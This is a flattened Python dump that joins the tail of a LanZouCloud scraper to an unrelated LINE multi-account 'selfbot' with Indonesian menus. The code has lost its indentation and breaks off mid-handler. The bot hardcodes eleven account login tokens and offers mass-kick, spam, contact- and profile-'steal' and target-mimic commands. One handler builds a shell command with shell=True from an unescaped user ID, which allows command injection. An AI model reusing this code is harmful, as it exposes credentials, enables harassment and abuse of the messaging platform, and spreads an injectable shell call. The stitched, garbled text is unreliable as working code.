if not f_time:
f_time = re.search(r'class="n_file_infos">(.+?)</span>', second_page)
f_time = f_time.group(1) if f_time else ""
return ShareInfo(LanZouCloud.SUCCESS, name=f_name, url=f_url, pwd=pwd, desc=f_desc, time=f_time, size=f_size)
else:
return ShareInfo(LanZouCloud.PASSWORD_ERROR)
else:
f_name = re.search(r"<title>(.+?) - 蓝奏云</title>", first_page) or \
re.search(r'<div class="filethetext".+?>([^<>]+?)</div>', first_page) or \
re.search(r'<div style="font-size.+?>([^<>].+?)</div>', first_page) or \
re.search(r"var filename = '(.+?)';", first_page) or \
re.search(r'id="filenajax">(.+?)</div>', first_page) or \
re.search(r'<div class="b"><span>([^<>]+?)</span></div>', first_page)
f_name = f_name.group(1) if f_name else "未匹配到文件名"
f_size = re.search(r'文件大小:</span>([\.0-9 MKBmkbGg]+)<br', first_page)
f_size = f_size.group(1) if f_size else ""
f_time = re.search(r'上传时间:</span>([-0-9 :月天小时分钟秒前]+)<br', first_page)
f_time = f_time.group(1) if f_time else ""
f_desc = re.search(r'文件描述:</span><br>([^<]+)</td>', first_page)
f_desc = f_desc.group(1).strip() if f_desc else ""
return ShareInfo(LanZouCloud.SUCCESS, name=f_name, url=f_url, pwd=pwd, desc=f_desc, time=f_time, size=f_size)
def get_user_name(self):
"""获取用户名"""
params = {'item': 'profile', 'action': 'mypower'}
resp = self._get(self._mydisk_url, params=params)
if not resp:
return LanZouCloud.NETWORK_ERROR
username = re.search(r"com/u/(\w+?)\?t2", remove_notes(resp.text))
return username.group(1) if username else None
|
hc.py
|
# -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
import time,random,sys,json,codecs,threading,glob,re,ast,os,subprocess,requests
cl = LINETCR.LINE() #
#cl.login(qr=True)
cl.login(token="EnC4WWaxlvwEmc7dcSP0.4CtAvksI2snhv2NVBSkYCa.K9u0pjo345g+5fss46dtUTn+LjHxqViO//X6+CKT0Ro=")#1
cl.loginResult()
ki = LINETCR.LINE() #
#ki.login(qr=True)
ki.login(token="EnvemTPs8Qa2YKbBuVA0.B7g9A1RW8NU9Ui7lAHrOWa.P9dilyizvd39lOy91f1hSk22KHV+2vPWgWHEa2g3Spc=")#2
ki.loginResult()
kk = LINETCR.LINE() #
#kk.login(qr=True)
kk.login(token="EnZOZZ9kZ4WODDsqxs31.RF06i2MlCDf8zeGTj9WU0q.S+5zMf1Ulpeky0KBbMpiOog1bTqCXwxmYweJe8cMi90=")#3
kk.loginResult()
kc = LINETCR.LINE() #
#kc.login(qr=True)
kc.login(token="EnXmBtomSJHCsdaFbZdf.W88yhLv5KB7iGCAeG9HatW.JpNZkvpWh/ILie0XwNxU1f6eZInAITSBteN8kOQQH3Q=")#4
kc.loginResult()
ks = LINETCR.LINE() #
#ks.login(qr=True)
ks.login(token="Ene9Ti1iIrkwXqp9vard.RwYWimxkEVVSTgGwDES4Zq.XEmoYOqPwOjAv1q1DeUC+fPgTKlZrQM71+GmDW1yXXg=")#5
ks.loginResult()
k1 = LINETCR.LINE() #
#k1.login(qr=True)
k1.login(token="En8IS0miLXUQRK9D50b7.u8nse0mL8msEHLnmv4aB1W.Y9mRU7kZaH8hsUBV4KTpztvVF6YemjGZC9CtTLdZaFw=")#6
k1.loginResult()
k2 = LINETCR.LINE() #
#k2.login(qr=True)
k2.login(token="En3DJV84kyxlnDxEUgu1.1syMstDSV3v24TYSaZhuGq.wnmv5YqJ2AD6eP9VlObpjho7+NgW1F/omh0DSd0jdfE=")#7
k2.loginResult()
k3 = LINETCR.LINE() #
#k3.login(qr=True)
k3.login(token="EnhD1jtFz3ZqmYc1Mwef.3prmqNlyijQkxY3rR/6PpW.NSIwoj99XE0PwmdZt/vC8LYvZSJad5x8sufNhgUMCe8=")#8
k3.loginResult()
k4 = LINETCR.LINE() #
#k4.login(qr=True)
k4.login(token="En4xeP1I33q9RyICo3N4.rCBoqd8kZcG5lfgqkkRHva.DIAy/ldfCcUHUiBdzuVN4O5ec02tA9f3X9EKEGW2gng=")#9
k4.loginResult()
k5 = LINETCR.LINE() #
#k5.login(qr=True)
k5.login(token="En4owc91dhuHipQNGKu1.2WTRlb8YIh0JVt5n/ZaU0q.9Y50ddvpinMlhC573QGWqGgPxnw6/7frBDn+55YOWTc=")#10
k5.loginResult()
satpam1 = LINETCR.LINE() #
satpam1.login(token="EnOSrXRDTndViSyfOlK8.sGVPEFXZ6i6+6rw8Kxi3Ua.puKa4M8/10ixNMfPO0r1K+X3VC7YM+XJigTgyBDZELc=")#satpam opo
#satpam1.login(qr=True)
satpam1.loginResult()
print 'login success bos'
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage ="""
╔═════════════
║ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
╠═════════════
║ Owner : Kris
╠═════════════
║ ◄]·♦·Menu For Public·♦·[►
║╔════════════
║╠[•]Help
║╠[•]Key
║╠[•]Mimin
║╠[•]Creator
║╠[•]Time
║╠════════════
║╠[•]Say....
║╠[•]Wkwkwk/Wkwk/Wk
║╠[•]Hehehe/Hehe/He
║╠[•]Galau
║╠[•]You
║╠[•]Hadeuh
║╠[•]Please
║╠[•]Haaa
║╠[•]Lol
║╠[•]Hmmm/Hmm/Hm
║╠[•]Welcome
║╠[•]Woy
║╠════════════
║╠[•]Wiki
║╠[•]Lyric
║╠[•]Instagram
║╠[•]Music
║╠[•]Youtube
║╠[•]Vidio
║╠════════════
║╠[•]Bc
║╠[•]Up
║╠[•]Berapa besar cinta
║╠[•]Apakah
║╠[•]Siapakah cewek
║╠[•]Siapakah cowok
║╠[•]Adakah
║╠[•]Cakepkah
║╠════════════
║╠[•]T-eng
║╠[•]T-japan
║╠[•]T-thai
║╠[•]T-id
║╚════════════
║ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
╚═════════════
"""
Keyowner ="""
╔═════════════
║ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
╠═════════════
║ Owner : Kris
╠═════════════
║ ◄]·♦·Menu For Admin·♦·[►
║╔════════════
║╠[•]Kick ...
║╠[•]Invite (by mid)
║╠[•]Undang (Invite by kontak)
║╠[•]Tarik/Jepit (Invite by kontak)
║╠[•]Adminlist
║╠[•]Bot Add @
║╠[•]Spam... (spam on 10 tes)
║╠[•]Bot? (cek kontak bot)
║╠[•]Cancel (cncl undngn trtunda)
║╠[•]clean invites
║╠[•]clear invites
║╠════════════
║╠[•]Message change:...
║╠[•]Message add:...
║╠[•]Message
║╠[•]Comment:...
║╠[•]Add comment:...
║╠════════════
║╠[•]Jam on/off
║╠[•]Change clock
║╠[•]Jam Update
║╠════════════
║╠[•]Status (cek status room)
║╠[•]Cctv
║╠[•]Intip
║╠[•]Toong
║╠[•]Nk
║╠[•]Tajong
║╠[•]Vkick
║╠[•]Emak/Abah
║╠[•]Kill
║╠[•]Absen/Respon
║╠════════════
║╠[•]Ifconfig
║╠[•]System
║╠[•]Cpu
║╠[•]Kernel
║╠[•]Debug speed
║╠[•]Bot speed
║╠[•]Speed respon
║╠[•]Sp turunin
║╠[•]Sp naikin
║╠[•]Turun lagi
║╠[•]Spbot
║╠[•]Sp asli
║╠[•]Speedbot
║╠[•]Speed
║╚════════════
║ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
╚═════════════
"""
Setgroup ="""
╔═════════════
║ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
╠═════════════
║ Owner : Kris
╠═════════════
║ ◄]·♦·Menu For Admin·♦·[►
║╔════════════
║╠[•]Cancel
║╠[•]Buka qr/Open qr
║╠[•]link open
║╠[•]Tutup qr/Close qr
║╠[•]link close
║╠[•]Rejectall (reject semua invite)
║╠[•]Protect:hight/low
║╠[•]Auto blockqr:off/on
║╠[•]Namelock:on/off
║╠[•]Blockinvite:on/off
║╠[•]Joinn on/off (kick protect join)
║╠[•]Cancel on/off(cncl all undngan)
║╠[•]Qr on/off (protect qr)
║╠[•]Contact On/off
║╠[•]Join on/off (auto join bot)
║╠[•]Gcancel:on/off (invite grup)
║╠[•]Leave on/off
║╠[•]Share on/off
║╠[•]Add on/off
║╠[•]Cancelall (canccel all invite)
║╠[•]Comment off/on
║╠[•]Backup:on/off
║╠[•]Mode on
║╠════════════
║╠[•]Info Group
║╠[•]ginfo
║╠[•]Group id
║╠[•]TL:....
║╠[•]Gn
║╠[•]LG
║╠[•]LG2
║╠[•]group list
║╠════════════
║╠[•]My mid
║╠[•]Mid Bot
║╠[•]Bot restart
║╠[•]Turn off bots
║╠[•]Allbio: (ganti bio stat bot)
║╠[•]Myname: (ganti nama bot)
║╠════════════
║╠[•]Banlist
║╠[•]Cek ban
║╠[•]Kill ban
║╠[•]Blacklist @
║╠[•]Banned @
║╠[•]Mid @"
║╠[•]Unban @
║╠[•]Ban
║╠[•]Unban
║╠════════════
║╠[•]Steal group pict
║╠[•]Steal cover @
║╠[•]Midpict:..
║╠[•]Steal pict
║╠[•]Steal bio
║╠[•]Steal mid
║╠[•]Steal contact
║╠[•]Mimic on/off
║╠[•]Targetlist
║╠[•]Mimic target
║╠[•]Target @
║╠[•]Del target @
║╠[•]copy @
║╠[•]Backup
║╠════════════
║╠[•]Spamcontact @
║╠[•]GBc
║╠[•]Pm cast
║╠[•]Bot like
║╠════════════
║╠[•]One piece
║╠[•]Kabur all
║╠[•]Kabur
║╠[•]Bot kadieu
║╠[•]Asupka:
║╠[•]Invite me
║╠════════════
║╠[•]Remove all chat
║╠[•]Admin add @ (by tag)
║╠[•]Admin remove @
║╠[•]Cleanse
║╠[•]Ready op
║╠[•]Greet
║╚════════════
║👑Hanya Utk Owner/Admin👑
╠═════════════
║ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
╚═════════════
"""
KAC=[cl,ki,kk,kc,ks,k1,k2,k3,k4,k5]
DEF=[ki,kk,kc,ks,k1,k2,k3,k4,k5]
kicker=[satpam1]
mid = cl.getProfile().mid
Amid = ki.getProfile().mid
Bmid = kk.getProfile().mid
Cmid = kc.getProfile().mid
Dmid = ks.getProfile().mid
Emid = k1.getProfile().mid
Fmid = k2.getProfile().mid
Gmid = k3.getProfile().mid
Hmid = k4.getProfile().mid
Imid = k5.getProfile().mid
Smid1 = satpam1.getProfile().mid
protectname = []
protecturl = []
protection = []
autocancel = {}
autoinvite = []
autoleaveroom = []
targets = []
parameterMap={}
contactIds=[]
Bots=[mid,Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid,Smid1]
induk=[mid]
Creator=["ufdf94db84c8d1fa665976c9eed50c8dd"]
admin=["ufdf94db84c8d1fa665976c9eed50c8dd",mid,Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid,Smid1] #Krisna,kris,
owner=["ufdf94db84c8d1fa665976c9eed50c8dd"]
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True,"members":1},
'leaveRoom':True,
'timeline':True,
'autoAdd':True,
'message':"""тerima Kasih Sudah Menambahkan Aku Jadi Teman
≫ Aku Ga Jawab PM Karna aq Cuma Bot Protect ≪
>>✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰<<
≫ bot protect ≪
≫ SelfBot ≪
ṡȗƿƿȏяṭєԀ ɞʏ:
☆ FS3I FAMILY ☆
✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
☆ ONE PIECE BOT PROTECT ☆
Idline: http://line.me/ti/p/GkwfNjoPDH""",
"lang":"JP",
"comment":"👉ąµţ๏ℓɨЌ€ By😊\n☆º°˚˚☆✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰☆º°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««",
"commentOn":False,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"blacklist":{},
"whitelist":{},
"wblacklist":False,
"dblacklist":False,
"namelock":True,
"Backup":False,
"AutoKick":True,
"Mimic":False,
"pname":True,
"qr":True,
"Protectgr":True,
"Protectjoin":False,
"Protectcancl":True,
"protectionOn":True,
"Protectcancel":True,
"winvite":False,
"winvite2":False,
"pnharfbot":{},
"pname":{},
"pro_name":{},
"atjointicket":True
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
wait3 = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
setTime = {}
setTime = wait2['setTime']
mulai = time.time()
contact = cl.getProfile()
backup = cl.getProfile()
profile = cl.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = ki.getProfile()
backup = ki.getProfile()
profile = ki.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = kk.getProfile()
backup = kk.getProfile()
profile = kk.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = kc.getProfile()
backup = kc.getProfile()
profile = kc.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = ks.getProfile()
backup = ks.getProfile()
profile = ks.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k1.getProfile()
backup = k1.getProfile()
profile = k1.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k2.getProfile()
backup = k2.getProfile()
profile = k2.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k3.getProfile()
backup = k3.getProfile()
profile = k3.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k4.getProfile()
backup = k4.getProfile()
profile = k4.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k5.getProfile()
backup = k5.getProfile()
profile = k5.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def yt(query):
with requests.session() as s:
isi = []
if query == "":
query = "S1B tanysyz"
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
if 'watch?v' in a['href']:
b = a['href'].replace('watch?v=', '')
isi += ['youtu.be' + b]
return isi
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def mention(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
def mention2(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
def MENTION(to,nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nama:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[COMMAND] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
def sendMessage(self, messageObject):
return self.Talk.client.sendMessage(0,messageObject)
def sendText(self, Tomid, text):
msg = Message()
msg.to = Tomid
msg.text = text
return self.Talk.client.sendMessage(0, msg)
def sendImage(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self._client.sendMessage(M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self._client.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
#r.content
return True
def sendAudio(self, to_, path):
M = Message(to=to_, text=None, contentType = 3)
M.contentMetadata = None
M.contentPreview = None
M2 = self.Talk.client.sendMessage(0,M)
M_id = M2.id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'audio',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self.post_content('https://obs-sg.line-apps.com/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload audio failure.')
return True
def sendImageWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def sendAudioWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'wb') as f:
r.raw.decode_content = True
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download Audio failure.')
try:
self.sendAudio(to_, path)
except Exception as e:
print e
def post_content(self, urls, data=None, files=None):
return self._session.post(urls, headers=self._headers, data=data, files=files)
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
return '%02d Jam %02d Menit %02d Detik' % (hours, mins, secs)
def NOTIFIED_READ_MESSAGE(op):
print op
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name + datetime.now().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "・" + Name + " ツ"
else:
pass
except:
pass
def RECEIVE_MESSAGE(op):
msg = op.message
try:
if msg.contentType == 0:
try:
if msg.to in wait2['readPoint']:
if msg.from_ in wait2["ROM"][msg.to]:
del wait2["ROM"][msg.to][msg.from_]
else:
pass
except:
pass
else:
pass
except KeyboardInterrupt:
sys.exit(0)
except Exception as error:
print error
print ("\n\nRECEIVE_MESSAGE\n\n")
return
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
tex = ["+","@","/",">",";","^","%","$","^","サテラ:","サテラ:","サテラ:","サテラ:"]
for tex in tex:
for command in commands:
if string ==command:
return True
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
if op.type == 55:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += '\n ☞ ' + Name
wait2['ROM'][op.param1][op.param2] = '☞ ' + Name
else:
pass
#-------------------------------------------
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・ " + Name + datetime.today().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "・ " + Name
wait2['setTime'][msg.to] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
else:
pass
except:
pass
#------------------------------------------
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
try:
G = cl.getGroup(op.param1)
except:
try:
G = ki.getGroup(op.param1)
except:
try:
G = kk.getGroup(op.param1)
except:
try:
G = kc.getGroup(op.param1)
except:
try:
G = ks.getGroup(op.param1)
except:
try:
G = k1.getGroup(op.param1)
except:
pass
G.name = wait['pro_name'][op.param1]
try:
cl.updateGroup(G)
except:
try:
ki.updateGroup(G)
except:
try:
kk.updateGroup(G)
except:
try:
kc.updateGroup(G)
except:
try:
ks.updateGroup(G)
except:
try:
k1.updateGroup(G)
except:
pass
if op.param2 in ken:
pass
else:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ks.kickoutFromGroup(op.param1,[op.param2])
except:
try:
k1.kickoutFromGroup(op.param1,[op.param2])
except:
pass
kk.sendText(op.param1,"please do not change group name-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
#------Protect Group Kick start------#
if op.type == 11:
if wait["Protectgr"] == True:
if cl.getGroup(op.param1).preventJoinByTicket == False:
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
try:
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "Jangan Buka Kode QR Woyyyyy...!!!")
cl.kickoutFromGroup(op.param1,[op.param2])
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
except:
random.choice(KAC).sendText(op.param1,random.choice(KAC).getContact(op.param2).displayName + "Jangan Buka Kode QR Woyyyyy...!!!")
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
Z = random.choice(KAC).getGroup(op.param1)
Z.preventJoinByTicket = True
random.choice(KAC).updateGroup(Z)
#------Protect Group Kick finish-----#
#------Cancel Invite User start------#
if op.type == 13:
if wait["Protectcancl"] == True:
group = cl.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
try:
random.choice(KAC).cancelGroupInvitation(op.param1, gMembMids)
random.choice(KAC).sendText(op.param1, "Mau Ngundang Siapa Ka?\nKk Bukan Admin\nJadi Aku Cancel😛")
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
random.choice(KAC).cancelGroupInvitation(op.param1, gMembMids)
random.choice(KAC).sendText(op.param1, "Mau Ngundang Siapa Ka?\nKk Bukan Admin\nJadi Aku Cancel😛")
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
#------Cancel Invite User Finish------#
#--------------------END_OF_OPERATION--------------------
if op.type == 0:
return
#-------------------NOTIFIED_READ_MESSAGE----------------
if op.type == 55:
try:
group_id = op.param1
user_id=op.param2
subprocess.Popen('echo "'+ user_id+'|'+str(op.createdTime)+'" >> dataSeen/%s.txt' % group_id, shell=True, stdout=subprocess.PIPE, )
except Exception as e:
print e
#------------------NOTIFIED_INVITE_INTO_ROOM-------------
if op.type == 22:
cl.leaveRoom(op.param1)
#--------------------INVITE_INTO_ROOM--------------------
if op.type == 21:
cl.leaveRoom(op.param1)
#--------------NOTIFIED_INVITE_INTO_GROUP----------------
if op.type == 13:
print op.param3
if op.param3 in mid:
if op.param2 in Creator:
cl.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Creator:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Creator:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Creator:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Creator:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Creator:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Creator:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Creator:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Creator:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Creator:
k5.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in mid:
if op.param2 in Amid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Bmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Cmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Dmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Emid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Fmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Gmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Hmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Imid:
cl.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Amid:
if op.param2 in mid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Bmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Cmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Dmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Emid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Fmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Gmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Hmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Imid:
ki.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Bmid:
